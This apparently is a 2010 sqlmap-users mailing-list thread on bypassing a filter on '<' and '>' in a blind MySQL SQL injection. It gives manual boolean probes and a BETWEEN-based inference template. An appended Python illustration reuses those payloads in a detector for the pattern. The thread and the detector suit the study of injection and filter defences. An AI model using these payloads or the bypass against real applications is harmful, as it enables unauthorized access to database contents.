Re: [sqlmap-users] blind sql injection problem
From: Miroslav S. <mir...@gm...> - 2010-02-23 11:14:28
Hi.

We'll take into consideration the implementation of a program option which could do this automatically - in the case of inference tests, usage of a BETWEEN program structure instead of the standard lesser/greater - or maybe use it as a primary concept.

Kind regards.

On Tue, Feb 23, 2010 at 10:59 AM, velky brat <vel...@gm...> wrote:
> Ok, I have resolved the problem. Just brief info for other users:
> If characters like '<' or '>' are filtered, it is possible to modify the query
> like this:
>
> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>
> vb
>
> On Sat, Feb 20, 2010 at 6:38 PM, velky brat <vel...@gm...> wrote:
>
>> Hello,
>> I have found a blind SQL injection in the GET parameter of an audited MySQL
>> application (sqlmap is also able to identify the injection), but it is not
>> possible to dump any data (like --current-user or --current-db). The only
>> option which is working is --fingerprint (gives the correct result of MySQL 5
>> version); all other options gave the same result as "None".
>> Because it looked strange to me, I made some basic tests manually with the
>> following results:
>>
>> http://localhost/index.php?id=9 AND 1 = 1 ---> TRUE (should be TRUE)
>> http://localhost/index.php?id=9 AND 1 = 0 ---> FALSE (should be FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 > 5 ---> FALSE (should be TRUE)
>> http://localhost/index.php?id=9 AND 6 < 5 ---> FALSE (should be FALSE)
>>
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 5 ---> FALSE
>> http://localhost/index.php?id=9 AND 6 BETWEEN 0 and 10 ---> TRUE
>>
>> As you can see from these results, it looks like the characters "<" and ">"
>> are filtered within the application.
>>
>> However, the injection is still working. I suppose that sqlmap uses these
>> characters ("<", ">") really often during the dumping of data from the database.
>> So I have changed the following line in the mysql section of the queries.xml file:
>>
>> original line:
>> <inference query="AND ORD(MID((%s), %d, 1)) > %d"/>
>>
>> updated line:
>> <inference query="AND ORD(MID((%s), %d, 1)) BETWEEN 0 AND %d"/>
>>
>> Unfortunately, the result was the same (None). What else should be modified?
>>
>> Is it possible to use a BETWEEN statement instead of ">" in the current
>> version of sqlmap?
>> Is it already supported somehow in sqlmap, or would it appear in future
>> versions?
>>
>> Thank you in advance
>>
>> vb
>>

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
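An added illustration, not part of the thread and not sqlmap's own code, that looks at the poster's observations from the defending side: a filter that strips only '<' and '>' breaks the relational probes but leaves the BETWEEN form fully functional, so a detection rule has to recognise the boolean-inference pattern rather than individual characters. The request lines and the `naive_filter`, `is_boolean_inference` and `audit` helpers are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample request lines (not taken from the thread). The id values
# mirror the manual probes the poster describes and the two queries.xml
# inference templates (the original '>' form and the BETWEEN form).
SAMPLE_REQUESTS = [
    "/index.php?id=9",
    "/index.php?id=9 AND 1 = 1",
    "/index.php?id=9 AND 6 > 5",
    "/index.php?id=9 AND 6 BETWEEN 0 and 10",
    "/index.php?id=9 AND ORD(MID((SELECT user()), 1, 1)) > 64",
    "/index.php?id=9 AND ORD(MID((SELECT user()), 1, 1)) BETWEEN 0 AND 64",
]

def naive_filter(value: str) -> str:
    """Filter the audited app seems to use: drop '<' and '>' and nothing else."""
    return value.replace("<", "").replace(">", "")

# A boolean-inference payload: AND/OR followed by a comparison expressed either
# with a relational operator or with BETTWEEN-style "BETWEEN x AND y".
INFERENCE_RE = re.compile(
    r"\b(?:AND|OR)\b\s+.+?\s*(?:[<>]=?|!?=|\bBETWEEN\b\s+.+?\bAND\b)",
    re.IGNORECASE | re.DOTALL,
)

def is_boolean_inference(value: str) -> bool:
    """True when the parameter value carries a usable boolean comparison."""
    return bool(INFERENCE_RE.search(value))

def survives_filter(value: str) -> bool:
    """True when the payload is still a working inference after the naive filter."""
    return is_boolean_inference(naive_filter(value))

def audit(request_lines):
    """Per request: does id look like an inference probe, and would the filter stop it?"""
    report = []
    for line in request_lines:
        id_value = parse_qs(urlparse(line).query).get("id", [""])[0]
        report.append({
            "id": id_value,
            "inference": is_boolean_inference(id_value),
            "survives_naive_filter": survives_filter(id_value),
        })
    return report

if __name__ == "__main__":
    for row in audit(SAMPLE_REQUESTS):
        print(row)
```

Every probe except the plain `id=9` is flagged, and the two BETWEEN payloads are the only operator-based ones that still pass through the character filter unchanged.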